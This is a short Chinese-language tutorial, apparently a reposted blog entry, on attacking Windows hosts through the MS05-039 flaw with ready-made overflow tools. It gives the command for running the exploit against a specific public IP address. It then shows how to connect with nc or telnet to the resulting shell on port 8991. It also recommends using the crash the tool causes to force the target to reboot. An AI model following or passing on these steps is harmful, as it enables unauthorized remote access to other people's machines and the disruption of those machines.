网上提供下载的MS05-039漏洞溢出工具有三种,有小榕改写的版本Ms05039,反连的Ms05039,Ms05039三个不同的版本。我先尝试进行了正向溢出。
在命令提示符窗口中进入“Ms05039”文件夹,运行“Ms05039.exe”文件后可以看溢出工具使用格式(如图1):Ms05039.exe? IP
图1 溢出命令格式
直接在程序文件名后跟上要溢出目标的IP地址或主机名即可,执行如下命令(如图2):Ms05039.exe? 58.42.220.22
图2 溢出攻击
命令执行后,提示发送溢出代码成功,并可检测远程攻击目标IP的8991端口是否打开。如果攻击目标存在漏洞的话,就可以利用NC或Telnet命令远程进行连接了。输入命令:nc -vv 58.42.220.22 8991
或者直接执行命令(如图3):telnet 58.42.220.22 8991
图3 连接被溢出的远程主机
命令执行后,可以看到成功的连接被溢出的远程主机,并获得一个Shell窗口了。
提示:
在使用上面的溢出工具时,很多时候常常会造成远程主机的“Service.exe”进程出错,从而自动重启主机(如图4)。因此常常也可以利用这个工具,对远程主机进行重启攻击。
图4 溢出造成远程主机重启动
参考资料:
http://blog.163.com/yelang1260@126/blog/static/51707586200992383253874/